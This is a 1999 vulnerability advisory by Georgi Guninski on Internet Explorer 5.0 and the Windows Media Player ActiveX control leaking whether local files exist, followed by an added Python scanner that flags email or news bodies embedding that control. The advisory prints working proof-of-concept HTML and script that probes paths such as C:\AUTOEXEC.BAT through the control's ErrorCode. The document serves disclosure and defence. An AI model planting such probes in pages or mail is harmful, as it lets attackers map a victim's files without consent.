IE 5.0 and Windows Media Player ActiveX object allow checking the existence of local files and directories

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program.
Georgi Guninski bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:
Internet Explorer 5.0 under Windows 95 (I guess other versions are affected) and the Windows Media Player ActiveX object allow checking the existence of local files and directories.
This vulnerability may be exploited by HTML email or newsgroup posting.

Details:
The problem is an error code returned by the Windows Media Player ActiveX object when an attempt is made to open a file.
The Windows Media Player ActiveX object returns the error "-2147220970" in the ErrorCode property when an attempt is made to open a file or directory that does not exist.
The code is:
----------------------------------------------------------------------------------------
<object id="wm" WIDTH=0 HEIGHT=0 classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95">
</object>
<SCRIPT>
// -2147220970 is the ErrorCode value returned when the file or directory does not exist
function checkfile()
{
  b=document.all.wm;
  b.FileName=document.forms[0].elements[0].value;
  if (b.ErrorCode == -2147220970)
    alert("File does not exist");
  else
    alert("File exists");
}
</SCRIPT>
<FORM>
<INPUT TYPE="TEXT" VALUE="C:\AUTOEXEC.BAT" SIZE=60>
<INPUT TYPE="SUBMIT" VALUE="Check file" onclick="checkfile()">
</FORM>
----------------------------------------------------------------------------------------

Workaround:
Disable Active Scripting or disable "Script ActiveX Controls marked Safe for Scripting".

Demonstration is available at http://www.nat.bg/~joro/mscheckf.html

Copyright 1999 Georgi Guninski

Regards,
Georgi Guninski
http://www.nat.bg/~joro
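
Since the advisory names HTML email and newsgroup postings as delivery paths, a content filter can flag bodies that embed this control. The following is an added example, not part of the original advisory or the author's code: a heuristic scanner keyed on the CLSID and the two property names shown above; the class, function and label names and the sample bodies are assumptions made for illustration.

```python
from html.parser import HTMLParser

# CLSID of the Windows Media Player ActiveX control, as given in the advisory.
WMP_CLSID = "22d6f312-b0f6-11d0-94ab-0080c74c7e95"
# Properties of the control that the advisory's script sets and reads.
PROBE_PROPERTIES = ("filename", "errorcode")

# Constructed sample bodies, not taken from real mail.
SAMPLES = {
    "plain": "<p>Meeting moved to 3pm.</p>",
    "embed": '<OBJECT ID="p" CLASSID="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95"></OBJECT>',
    "scripted": '<object id="p" classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95">'
                "</object><SCRIPT>p.FileName = f; r = p.ErrorCode;</SCRIPT>",
}

class WmpScanner(HTMLParser):
    # Counts WMP <object> embeds and collects lower-cased <script> bodies.
    def __init__(self):
        super().__init__()
        self.wmp_objects = 0
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "object":
            classid = (dict(attrs).get("classid") or "").lower()
            if classid.replace("clsid:", "").strip("{} ") == WMP_CLSID:
                self.wmp_objects += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data.lower())

def classify(html_body):
    """Return 'clean', 'wmp-embed' or 'wmp-scripted' for one HTML body."""
    scanner = WmpScanner()
    scanner.feed(html_body)
    scanner.close()
    if scanner.wmp_objects == 0:
        return "clean"
    script = " ".join(scanner.scripts)
    return "wmp-scripted" if all(p in script for p in PROBE_PROPERTIES) else "wmp-embed"

if __name__ == "__main__":
    print({name: classify(body) for name, body in SAMPLES.items()})
```

The match is a string heuristic: script that reaches the control's properties indirectly will be reported only as `wmp-embed`, so treat any embed of this CLSID in mail or news content as worth reviewing.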